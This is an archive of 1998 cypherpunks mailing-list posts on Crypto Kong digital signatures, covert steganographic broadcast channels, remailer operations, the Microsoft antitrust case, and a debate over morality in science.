At 09:30 PM 1/13/98 EST, Dr.Dimitri Vulis KOTM wrote:
>
>Is it possible to make it cryptographically hard to determine where
>the data is stored?
>

Eternity.  Look it up.



------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	     Directorate of Intelligence, CIA
	     http://www.jya.com/cia-notes.htm
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 15 Jan 1998 05:01:02 +0800
To: Filtered Cypherpunks List <cypherpunks@toad.com>
Subject: Crypto Kong penetration.
Message-ID: <199801142049.MAA02259@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    -- 2
Since release there have been a very large number of hits on
the Kong documents, and mere 102 downloads of the program,
and 74 downloads of the source code.

The large number of source code downloads indicates that I am
only reaching the crypto techie audience, that for the most
part is already able to use PGP, not the non tech audience
that Crypto Kong was designed for.

On my web page I have documentation as to how business users
can and should use this product.  (See the section "contracts
and certificates" <http://www.jim.com/jamesd/Kong>

I and Mather Cromer have prepared a release document targeted
at business users  (See below)

Does anyone have any suggestion of how to get the message in
front of the target audience?

 (press release oriented towards businessmen follows: 


    --
    Announcing Crypto Kong.

    Free digital signatures and encryption.

    <http://www.jim.com/jamesd/Kong/Kong.htm>.

    Many businessmen use a faxed signature for a contract, or for
    authority to act, or worse still, a shared password, as
    stockbrokers often do.  This is almost worthless.

    The signature on a fax can be, and often is, a mere bitmap,
    not genuinely scanned in from a signature written in ink on a
    paper document, but merely applied digitally to an image in
    computer memory.  If that bitmap was also applied to some
    other document sent to the same company, which it usually
    was, then the fax proves nothing.

    On the other hand, often one cannot wait for FedEx to deliver
    signed documents.   The answer is digital signatures and
    encryption. With digitally-signed electronic documents, you
    can send unforgeable signed documents instantaneously across
    the globe.

    Crypto Kong is easy to use and it uses the same identity
    model that as businesses today use for ordinary handwritten
    signatures,  unlike other products which impose their own
    different way of handling identity.

    Crypto Kong takes away the hassles of certificate management,
    public key authentication, and complicated operating
    instructions.  Anyone can immediately use it to sign
    documents, to compare signatures  or to encrypt sensitive
    messages.  Kong compares the signatures on documents, rather
    than comparing a signature against certificates.

    Crypto Kong software makes it easy to send or receive
    digitally signed documents or use top grade encryption to
    keep messages private.

    Crypto Kong provides support for contracts and the
    documentation that accompanies transactions.

    The Crypto Kong application and detailed documentation
    information is available as a free download from the Kong
    home page:

    Kong is compatible only with Windows 95 and Windows NT.
    Complete source code is also available for download from the
    home page.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     SgQ8pgY/MeQpI9CfGR5kSsRdW61mSVYtqHkEMoMU
     47jSLQPPmYxhaKH9MyohUU9Q9i3bzVWjwey/s3Od4


    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     gME+6HSq3N3G1iw88pJyVqcNc8dlMZhS2f+zUijA
     4IpLFuTI1zY7tEU4+gDAFM6uhgcWP9IyA/3guXt7j     
     4WRob8mo+81LCLSyU4RiPNOilXHZTlyvZzsFMr+9d




 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Crisavec <dbrown@alaska.net>
Date: Thu, 15 Jan 1998 07:27:08 +0800
To: wombat@mcfeely.bsfs.org
Subject: Re: cypherpunks and guns
Message-ID: <3.0.5.32.19980114135342.008c9d80@alaska.net>
MIME-Version: 1.0
Content-Type: text/plain




All I'm saying is that not EVERYONE who collects a government paycheck has
"diminished mental capacity"  I know several people with genius level IQ's
that simply don't care where they work....And that's something to remember...

>> >
>> >The fact that they collect a paycheck from the government is prima facie
>> >evidence of diminished mental capacity.
>> 
>> Don't bet on....
>> 
>> 
>> There is only one war, and it's not between the whites and the
>> blacks, Labour and the Conservatives, Democrats and Republicans, or
>> the Federation and the Romulans, it's between those of us who aren't
>> complete idiots and those of us who are.
>> 
>> 
>Who's side are you on?
>
>


 --Dave

************************************************************************
*   There is a theory which states that if anyone ever discovers       *
* exactly what the Universe is for and why it is here, it will         *
* instantly disappear and be replaced by something even more           *
* bizarre and inexplicable.                                            *
*                                                                      *
* There is another theory which states that this has already happened. *
*                                                                      *
*                           "The Hitchhiker's Guide To The Galaxy."    *
************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 15 Jan 1998 07:15:16 +0800
To: Tim May <tcmay@got.net>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <v03102804b0e238146c15@[207.167.93.63]>
Message-ID: <199801142307.PAA18916@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



timmy predictably states the case for moral relativism.

>I think it's an error to use "moral" or "immoral" as a modifier for "science."
>
>It's a matter of opinion/ethics as to whether some science is "for immoral
>purposes," but calling something "immoral science" is fraught with trouble.
>
>To a vegetarian, any science related to meat production is "immoral science."

well, the concept of "criminality" is likewise fraught with trouble.
what is criminal and what is not? obviously some definitions stretch
the limits. is a jaywalker a criminal? a political dissident? ok, how
about an axe murderer?  similarly, I think your predictable opposition
to the use of the word "immoral" is specious. 

moreover, I think such a  misunderstanding, or worldview, is 
detrimental to human welfare in general. I think all the evil 
government scientists I've been referring to recently would
very much agree with you on rejecting ideas of "morality" and 
"conscience". a person does not need an infallible definition
of morality to navigate the world, imho, but a person that has
none, or rejects any such attempt, is part of the problem and
not part of the solution, imho.

>Personally, I don't view scientific experiments done on condemned prisoners
>as immoral. If a human being has already been sentenced to die, and, for
>example, accepts some payment (perhaps for his heirs) to die in some
>scientifically interesting way, why call it "immoral"?

oh, well, lets see, you have a very obvious glitch in your reasoning.
you presume the prisoner gives his permssion. now lets see, assume he
doesn't? just to pop a hypothetical example out of the blue,
say someone named timmy gets arrested for gun violations and
gets thrown in jail temporarily. would it be immoral for the
police to remove his organs? perhaps without his permission? 
perhaps without anesthetic? if not immoral, what? criminal? criminal
but not immoral?

>While I would not have, I hope, worked in a Nazi death camp, the science
>obtained is undeniably real science, some of the only solid data we have on
>freezing humans, on exposing them to pathogens, etc.

I've seen your defense of these experiments before-- its a topic of
interest for you for obvious reasons; it presents a possible glitch
in your moral relativism.

I don't think BWs claim that there is a difference between 
immoral scientists and immoral science. immoral science is what
immoral scientists practice. what's the point? my personal point
is that if we had a culture of people who were concerned about
morality, perhaps we would have institutions that reflect
integrity. 

contrary to most here, I believe that our institutions
are correctly representing the people of a country-- their thoughts,
their motivations, their concerns. its key to the philosophy of
disenfranchisement, apathy, and nihilism (and anarchism) to 
claim that the government is not representing the people. what
is the evidence for this? 

because the government is corrupt,
the people are not necessarily corrupt? because the government
is greedy and full of powermongers, the population is not
full of greedy powermongers who would do the same given the
opportunity? government is a mirror into our psyches that
few people care to gaze on, precisely because we are not
the fairest of them all.

we've got the government we deserve, and it reflects our
own pathologies within our psyches back to us. it reflects our
laziness and apathy, our cynicism, our alienation, our 
withdrawal. and it takes a person who can master themselves 
to face up to this simple truth-- something that most everone of our 
country has failed to admit.

when we begin to ask questions like "what is integrity" and
"what is moral" and come up with serious answers, our world
will improve. it will degenerate otherwise, and has given us
a tremendous existence proof of that fact to date.

but just remember, again, that I'm aimlessly ranting here, and there's no
need to take any of this seriously <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 15 Jan 1998 09:13:23 +0800
To: cypherpunks@cyberpass.net
Subject: More on the POLITICS of antitrust
Message-ID: <Pine.GSO.3.95.980114170047.23607J-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded

===

At some points over the last decade, I would have said that the large-firm
monopolization case was dead. We had learned our lesson - big-time
trust-busting didn't pay. Mergers were OK and so were businesses that
succeed by competing hard. The few initiatives didn't go very far: the
early 1990s FTC investigation of Microsoft deadlocked; DOJ then wrested a
largely cosmetic consent decree in 1994/95; the FTC looked at but then
walked away from Intel. The political will to do any real damage seemed to
be lacking, perhaps because these were successful export industries. 

Not so now. The events of the last few months suggest that the outlook is
more serious both for Microsoft and for Intel, and further down the road,
for firms like Cisco (king of the network routers) or Sun (if Java ever
lives up to its hype). Money attracts politics (hence the bevy of attorney
generals in action now), and we were foolish to expect otherwise. The
implicit policy of going easy on America's information technology success
stories has been abandoned. Aside from the competitor complaints and aside
from the simple populist attack on wealth, another factor may play a role: 
populist resentment of the "digerati" (those who are computer savvy). (I
intend a parallel with the late 1920s, when despite the general boom,
large segments - the buggy whip manufacturers - complained about
"profitless prosperity," laying the political groundwork for Hoover's
veiled New Dealism. No, I am not predicting another Great Depression.) 

===






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Thu, 15 Jan 1998 09:39:52 +0800
To: Ross Anderson <eternity@internexus.net
Subject: Re: Covert Superhighway - the missing component?
In-Reply-To: <E0xsPbf-0002vu-00@heaton.cl.cam.ac.uk>
Message-ID: <3.0.5.32.19980114173613.007c8100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:59 AM 1/14/98 +0000, Ross Anderson wrote:
>Scratch Monkey proposes building an Eternity service using the Stego
>File System, provided an anonymous broadcast channel exists - it's
>assumed that alt.anonymous.messages will do the job.
>
>I suspect that wide deployment of Eternity would lead to this group
>being closed down. We need a more robust anonymous broadcast
>channel. Let's call it the `Covert Superhighway'. How do we build it?

Usenet is useful for this because flood routing works well,
and because millions of people send hundreds of megabytes a day
of cover traffic, and tens or hundreds of thousands of machines
are connected to it, so any individual machine connecting or
retrieving traffic from it is not suspicious.  It's also useful
because forgery is easy and tracing is tedious, and because there's
no central control in spite of the occasional cabals.

If we build a sub-usenet to carry our traffic, it's easy to
build good flood routing (and most of the tools can be reused),
but it isn't easy to get millions of users and thousands
of machines of cover traffic to piggyback on unless you
either create something new and really cool, or unless you
find something already cool, decentralized, and loud
to piggyback on that doesn't make your traffic noticeable.

Some directions to look:
- Stego inside Voice-over-IP - (Ron Rivest's suggestion)
This can either work because yet another phone call isn't
very suspicious, though traffic analysis is a possibility,
or you can develop the Killer Voice App for the Masses
which does store&forward of its own bits without telling them.
- IRC is one possibility, though I don't know how big it is.
- CU-SeeMe reflectors are fun, and you can stego a lot of traffic
inside your pictures.
- Ship Anonymizers with every copy of Apache (or Apache-SSL),
which is the most popular web server in the net.
- Webcam Stego for webcams with high-entropy changing pictures,
e.g. cloudy skies or oceans rather than mostly-static coffeepots.

Adam Back's idea of piggybacking on gaming nets could be 
among the more interesting approaches, at least for games
that don't have a central control system.

In general, I'd guess that the limits of stego are that
you can't really hide more than about 10% contraband
inside your cover material, and for some methods it's a
lot less.  If you assume the typical user has a 28.8 line,
you can get maybe the equivalent of 2400 bps of real traffic.
Fine for banking; a bit rough for selling lots of large images,
too slow for live speech.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Antonomasia <ant@notatla.demon.co.uk>
Date: Thu, 15 Jan 1998 03:34:21 +0800
To: remailer-operators@anon.lcs.mit.edu
Subject: REMAILERS: please cut down on mccain + tea
Message-ID: <199801141740.RAA03536@notatla.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Sorry about this, but I'd really like to see a decrease
in the traffic through mccain and tea from next weekend
lasting the next couple of months.  I'm thinking of helping
this decrease by adjusting the remailer configuration
variables, and restricting the time I spend dialled-up.

In view of the fact that some people will press on anyway
it's probably best if most of you regard these 2 remailers
as temporarily closed.  If you have a reply block leading
through tea, and it gets low traffic, and you can tolerate
extra delay you might wish to leave it in place.

This is nothing to do with the recent modem problem, nor
the size of my phone bill, and I have not been got at by GCHQ.
I have a really good reason for this, and if you knew what I know ...

Hope to be business as usual by late March.  I am not
contemplating a permanent shutdown.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAgUBNLz4SkrZ5ZQH9XIxAQGKCAP9GEI3dRL2xJpF/MXC6HiCbnjaRBKDQUbt
23hUBmSgo3E3eB9tP/ZEavXFW9A0IMKMV1qfULK5HOvgYgQMkSX708Z7mGSqfWUQ
nmAmMUmYW3Nww+b3lZ71Ou+LpZLrY2iGu59wOSFCKGyxgPrq1ScbqlIl/3ActWw2
3T4a/k8CPkA=
=crE5
-----END PGP SIGNATURE-----

--
##############################################################
# Antonomasia   ant@notatla.demon.co.uk                      #
# See http://www.notatla.demon.co.uk/                        #
##############################################################





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 15 Jan 1998 10:31:27 +0800
To: Declan McCullagh <cypherpunks@cyberpass.net
Subject: Re: Public choice theory and the politics of antitrust
In-Reply-To: <v0300780eb0e309e2c6d8@[168.161.105.216]>
Message-ID: <v03102800b0e323c682c4@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:34 PM -0800 1/14/98, Declan McCullagh wrote:
>I wrote a little about public choice theory and the politics of antitrust
>in my article last week:
>
>  http://cgi.pathfinder.com/netly/opinion/0,1042,1678,00.html
>
>Attached are excerpts from recent posts to a law and economics mailing list
>I'm on. I'm unsure of the reposting policy, so I'm deleting authors' names.
>Should be good reading anyway.

I think, Declan, that deleting the author's name is a Big Problem. I
inititally assumed you wrote these words, and was preparing a rebuttal
(esp. to the fanciful " Intel's Portland facility has 800 programmers
charged with coming up with something as cool as the operating system
developed by Next. Stay tuned." piece of nonsense.

But then I went back and read your "deleting author's names" line, so now I
have no idea who I'm rebutting.

You have essentially made this author "Anonymous."

A better approach is to ask his permission, for something substantive like
this piece is, and then either post his words with his name, or not post it.

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Thu, 15 Jan 1998 11:22:32 +0800
To: cypherpunks@cyberpass.net
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <v03102804b0e238146c15@[207.167.93.63]>
Message-ID: <3.0.5.32.19980114191915.007f5990@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



Vladimir the MoraLogical wrote:

>I don't think BWs claim that there is a difference between 
>immoral scientists and immoral science. immoral science is what
>immoral scientists practice. what's the point? my personal point
>is that if we had a culture of people who were concerned about
>morality, perhaps we would have institutions that reflect
>integrity. 
...........................................................

First the question was, what is "moral", now it must be, what is "science":
 what makes science, or its methods, 'scientific' - what's the difference
and what's the point; is there a relation, and which is first, the chicken,
or the egg (could science discover the truth about morality, and would that
make the science moral, or the scientists)?

Of course, if people were more moral, we would have institutions which
reflected that integrity.  The problem is, how could they be made to become
so, and what type of methods, used toward that end, would be moral?

    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 15 Jan 1998 08:38:19 +0800
To: cypherpunks@cyberpass.net
Subject: Public choice theory and the politics of antitrust
Message-ID: <v0300780eb0e309e2c6d8@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



I wrote a little about public choice theory and the politics of antitrust
in my article last week:

  http://cgi.pathfinder.com/netly/opinion/0,1042,1678,00.html

Attached are excerpts from recent posts to a law and economics mailing list
I'm on. I'm unsure of the reposting policy, so I'm deleting authors' names.
Should be good reading anyway.

-Declan

===

Assume for the moment that Microsoft is doing something wrong that the
government should stop (a reach, I admit).  If that is the case, how did
the Justice Department come up with the figure of $1 million per day?  Is
that figure supposed to be compensatory, punitive, deterrent, or what?
What goal is a daily fine supposed to accomplish that some more
specifically-tailored remedy (injuntive relief, for instance) could
not?  Are there public choice explanations for what is driving this, and
if so, what are they?

===

The Government's argument, I believe, is that Microsoft violated the
consent order.  A fine under these circumstances should punish the party
that violated the order, deter it from violating the order again, and deter
others from violating other orders.

As for a public choice explanation, based upon the history of the
present Administration, I suspect that one could be found in the records of
the Federal Election Commission, i.e., I suspect that executives and
shareholders of Microsoft's enemies have made far larger political
contributions than Bill Gates and his colleagues.

===

Intel has in fact come under attack. The FTC has been investigating Intel
for several months. The charge is similar to the rap on Microsoft - trying
to dominate the inside of the computer by controlling the interface between
the processor and "helper chips." The wonder is that Intel hasn't taken
over the motherboard market - something that may also be more efficient,
just as seemless integration of the operating system and browser and other
applications is more efficient. Recall also that the FTC did in fact
investigate Intel in the early nineties, though it filed no charges in the
end. (I suspect that the FTC's institutional credibility is at stake. Since
this is the second Intel probe, they're going to have come back with at
least a symbolic consent decree.)

Still, I would grant that the attack on Microsoft is more strident.
Domestic political economy may play a role. Microsoft has vocal domestic
competitors (Oracle, Netscape and Novell, for example). It's no coincidence
that Republican Senator Hatch represents Novell's home state. Intel, in
contrast, is viewed as the company that's keeping the foreigners at bay.
Well yes, conduct and arrogance matter too. And sitting on a big pile of
cash helps. That explains why a number of state AG's jumped on the
anti-Microsoft bandwagon after the tobacco settlement.

Finally, yes, Windows is a terrible operating system and almost everyone
has an interest in seeing something better. (A confirmed Mac user, I
compare Windows to the aliens in "Men in Black:" arthropod DOS stuffed into
the skin of humanoid Mac.) Intel does have an incentive and the means to
come up with a better operating system: Windows hurts the demand for its
chips. Not surprisingly, Intel's Portland facility has 800 programmers
charged with coming up with something as cool as the operating system
developed by Next. Stay tuned.

===

[I interpret "substantial appropriable quasi-rents to be taxed away" as
"campaign cash or political contributions to be expropriated as necessary
by the government." --Declan]

There are two reasons to go after a successful company.  One possibility is
that it has substantial appropriable quasi-rents to be taxed away.  Even if
a company's equity is high, it is not readily taxable if the assets can
readily be withdrawn (e.g., Becker and Stigler's argument that Jews stayed
out of agriculture because they could too easily be expropriated).

The other reason for going after a successful company is to assist its
competition.  This may explain the attack on Microsoft ...
and probably the attack on Milken as well, if you are persuaded,
as I am, by Daniel Fischel's book on the case.

===

 There has been a lot of talk about how hard Clinton has been on
Microsoft. I wonder. Is it possible that Clinton has been
 soft on Microsoft?  Hi-Tech generally has been very pro-Clinton,
and
contributed a lot of money to him.  The fact that Justice is going
after Microsoft now is not determinative. It seems to me that
Microsoft was surprisingly arrogant in thinking it could get away
with this blatant violation of the consent decree.

 THink of the Priest-Klein selection problem as applied here. PK
implies that even if the judge is heavily pro-plaintiff, plaintiffs
will win only 50 percent of the time in his court. The reason is
that
plaintiffs will bring even totally outrageous suits, knowing the
judge might still rule in their favor. I suspect the same has
happened with Microsoft. Confident that Clinton would block any
response from Justice, they violated the consent decree. They still
hope Justice will back down. So far, they are wrong (tho--has the
fine been imposed yet, or has the judge delayed imposition?). The
most humorous part is that Rush Limbaugh, a conservative Apple user,
has been cheering for Microsoft, a notably liberal company.

===

>       Can anybody give an efficiency explanation for this? Prima
> facie, it is monopolizing conduct.  Microsoft's absurd excuses are
> that (a) Explorer is an integral part of Windows 95, and (b)
> Allowing Netscape to come up automatically would spoil the integrity
> of Windows 95.

Microsoft's behavior is indeed puzzling.  You would think that even though
Windows has such a large market share, Microsoft would wish to enhance
Window's appeal even further by making it as easy as possible for those who
prefer Netscape to access Netscape easily.

But, regardless of the wisdom of Microsoft's tactics, given what Eric
reports about the DOJ's complaint against Microsoft, why the mighty
brouhaha?  Do computer users really need federal forces to help them put
Netscape's icon on their Windows screen?

===

The DOJ wants Microsoft to be found in contempt for violating the '95
consent decree (Section IV (E)(i) of the Final Judgement) which prevents
Microsoft from requiring OEM manufacturers to license other Microsoft
products as a condition of recieving a license to install Windows '95 on
the computers they produce -- is this not what "bundling" means?

The icon business arises because three firms asked Microsoft to ammned the
license agreement to allow them to remove the IE icon from the desktop and
Microsoft refused to grant their requests.  This is mentioned in the DOJ
request for an order of contempt, but if Internet Explorer really is
considered a separate product (and the DOJ claims it is) then Microsoft
really isn't allowed to require firms to license it if they license Windows
95.  Microsoft insists that requiring the licensing of Internet Explorer,
sans icon, is still requiring the licensing of Internet Explorer, something
they aren't allowed to do under the consent decree if IE is a separate
product, but that it isn't a separate product so everything is just ducky.
They also add that if Internet Explorer, sans icon, isn't licensed Windows
won't work.  They think it's silly to claim that the consent decree
requires them to sell Internet Explorer, sans icon, as a part of Windows
but prevents them from selling Internet Explorer, with icon, as a part of
Windows.

As to the why of it all...

Microsoft believes, and the government agrees, that the browser itself is
the seed of a new sort of operating system which will become a viable
alternative to Windows 95.  Microsoft says it wants reshape Windows into
this new sort of operating system, the DOJ seems to want someone else to
come up with it.  From the DOJ's request to show cause why Microsoft should
not be found in civil contempt:

"Microsoft's aggressive and multi-faceted marketing of the Internet
Explorer browser reflects its intense competition with other, competing
Internet browsers, primarily the "Navigator" browser produced by Netscape
Communications Corporation ("Netscape").

Microsoft believes that the success of competing browsers poses a serious,
incipient threat to its operating system monopoly. Indeed, as Microsoft
fears, browsers have the potential to become both alternative "platforms"
on which various software applications and programs can run and alternative
"interfaces" that PC users can employ to obtain and work with such
applications and programs. Significantly, competing browsers operate not
only on Windows, but also on a variety of other operating systems.
Microsoft fears that over time growing use and acceptance of competing
browsers as alternative platforms and interfaces will reduce the
significance of the particular underlying operating system on which they
are running, thereby "commoditizing" the operating system."


And it's really hard for me to read this in any way other than "Microsoft
is starting to realize that a web based operating system would be a better
product than Windows 95 and is trying to create such an operating system,
but we don't want them to because they're a monopoly."

===

> And about Congressional consistency:  Let's suppose that Congress in July
> of 1890 did indeed intend the Sherman Act to help consumers.  Surely any
> institution so fickle as to go from being consumers' friend to being
> consumers' foe in a mere three months (by October 1890 when it hiked tariff
> rates) is not an institution to be trusted with the awesome power to decide
> which business practices do and do not constitute anticompetitive behavior.

I would add:

Why would anyone expect a Congress (1) in which a single majority party
leader appointed the chairmen of each legislative committee (2) that
used its committees to appoint the vast majority of federal workers (3)
operating in an environment in which the pressure group had not yet
emerged, to serve consumers? There is not only an antitrust myth, there
is a myth among economists that the legislators of the period had any
reason to make decisions based on the logic of economics. We might call
this the legislature myth. The antritrust myth and the legislature myth
seem to be stories we tell our little children in order to avoid scaring
them. Unfortunately, many professional economists treat their students
like little kids.

===

> So, you and I also agree that Congress often does stupid things. But what
> is the alternative - do you know of a better system?

Yep.  A common-law system with no antitrust statutes.

===






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 15 Jan 1998 09:53:22 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Covert Superhighway - the missing component? (fwd)
Message-ID: <199801150219.UAA03045@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 14 Jan 1998 17:36:13 -0800
> Original-From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: Covert Superhighway - the missing component?

> - CU-SeeMe reflectors are fun, and you can stego a lot of traffic
> inside your pictures.

The problem here is the processor overhead requied to take advantage of a
high frame rate. The startup costs are gonna be a bear.

> Adam Back's idea of piggybacking on gaming nets could be 
> among the more interesting approaches, at least for games
> that don't have a central control system.

The problem here is that most gamers are responce-sensitive. They'll begin
to wonder at some point where all that extra bandwidth is going.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 15 Jan 1998 10:04:37 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re:  [POLITICS] 1 Question to Dr. Froomkin... (fwd)
Message-ID: <199801150229.UAA03125@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 14 Jan 1998 09:13:07 -0800
> Original-From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re:  [POLITICS] 1 Question to Dr. Froomkin...
> 
> you and I are political theorists, and you're asking a political question,
> though I'm not sure what kind of question you mean.

Actualy I am more interested in the why's and wherefor's of the actual
application and less in the theory. If the issue was only theoretical there
wouldn't be over a million people in US jails and the other various excesses
that are currently permitted. That is far from theoretical.

> To a lawyer, the answer is that the Constitution ultimately means
> whatever you can talk the Supreme Court into saying it means,

That is one of the problem with the current approach. The Constitution is
not taken to mean anything. A fundamental flaw, theoreticaly or practicaly.
It is considered a document written by a bunch of long dead guys with little
if any application for todays social structures.

> So which question are you asking, and why?

I'm asking Dr. Froomkin whether he accepts the Constitution as the defining
document of the government (not just the courts which is implicit but
unstated in your various questions) of the United States. I apologize if the
question was unclear. I had intended to structure it in such a way that it
was absolutely clear - it is a yes/no question after all.

Why? Because I want to know. The answer would provide insight and might
provide further information for future strategies.

There is an old saying: Know thy enemy.



    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wayne Radinsky <waynerad@oz.net>
Date: Thu, 15 Jan 1998 13:17:29 +0800
To: "'Blanc'" <blancw@cnw.com>
Subject: RE: rant on the morality of confidentiality
Message-ID: <01BD2130.FFFF2520@sense-sea-pm6-7.oz.net>
MIME-Version: 1.0
Content-Type: text/plain




The reason morality is impossible to nail down is because it does not exist al all in any absolute sense, at least as far as science is concerned.  If you declare, for example, that "murder" is "wrong" you are always left with dilemmas, such as whether soldiers who kill during a war are doing something "wrong".

According to the principle of natural selection, all people, including scientists, exist purely to maximize their own inclusive genetic fitness.  "Fit" means that an organism is well adapted to it's environment, so "maximizing inclusive genetic fitness" means having the maximum number of offspring which are themselves fit.

Keep in mind that all natural selection really does is decide which genes are allowed to propagate, and since genes are just digital information stored on DNA molecules, what we call "life" is really just a complex interaction of matter/energy which determines which bits of information continue to exist over time.

The underlying reason people benefit by promoting themselves as moral people, in general, is because of the benefit of what evolutionary psychologists call reciprocal altruism.  With reciprocal altruism, both parties benefit if they are in a non-zero-sum situation.  Because most situations are non-zero-sum and the benefits are so great, everyone has a stake in promoting themselves as a good reciprocal altruist, in other words, a good, trustworthy, moral person.  This is how natural selection explains the existence of the concept of "morality".

So it is a myth that scientists live to find deep truths or to benefit humanity.  They may do those things, but their real goal is maximizing their own inclusive fitness.  However, it may profit them if everyone else believes they live to find deep truths or to benefit humanity.  Natural selection has created human beings, and the concept of "morality" in our minds, because moral justifications benefit the people promoting them -- which ultimately benefits their genes.

The only way out is to believe in the afterlife, and religion, and that life has meaning beyond the genes and material world. Doing so doesn't make moral dilemmas go away, and you never know, people may just be believing such things for the benefit of genes, after all natural selection has no real concern for "truth".

Wayne

----------
From: 	Blanc[SMTP:blancw@cnw.com]
Sent: 	Wednesday, January 14, 1998 7:20 PM
To: 	waynerad@oz.net
Subject: 	Re: rant on the morality of confidentiality 

>X-Authentication-Warning: netcom5.netcom.com: vznuri@localhost didn't use
HELO protocol
>To: Tim May <tcmay@got.net>
>cc: Bill Stewart <bill.stewart@pobox.com>, Blanc <blancw@cnw.com>,
>        cypherpunks@cyberpass.net, vznuri@netcom5.netcom.com
>Subject: Re: rant on the morality of confidentiality 
>Date: Wed, 14 Jan 98 15:07:48 -0800
>From: "Vladimir Z. Nuri" <vznuri@netcom.com>
>
>timmy predictably states the case for moral relativism.
>
>>I think it's an error to use "moral" or "immoral" as a modifier for
"science."
>>
>>It's a matter of opinion/ethics as to whether some science is "for immoral
>>purposes," but calling something "immoral science" is fraught with trouble.
>>
>>To a vegetarian, any science related to meat production is "immoral
science."
>
>well, the concept of "criminality" is likewise fraught with trouble.
>what is criminal and what is not? obviously some definitions stretch
>the limits. is a jaywalker a criminal? a political dissident? ok, how
>about an axe murderer?  similarly, I think your predictable opposition
>to the use of the word "immoral" is specious. 
>
>moreover, I think such a  misunderstanding, or worldview, is 
>detrimental to human welfare in general. I think all the evil 
>government scientists I've been referring to recently would
>very much agree with you on rejecting ideas of "morality" and 
>"conscience". a person does not need an infallible definition
>of morality to navigate the world, imho, but a person that has
>none, or rejects any such attempt, is part of the problem and
>not part of the solution, imho.
>
>>Personally, I don't view scientific experiments done on condemned prisoners
>>as immoral. If a human being has already been sentenced to die, and, for
>>example, accepts some payment (perhaps for his heirs) to die in some
>>scientifically interesting way, why call it "immoral"?
>
>oh, well, lets see, you have a very obvious glitch in your reasoning.
>you presume the prisoner gives his permssion. now lets see, assume he
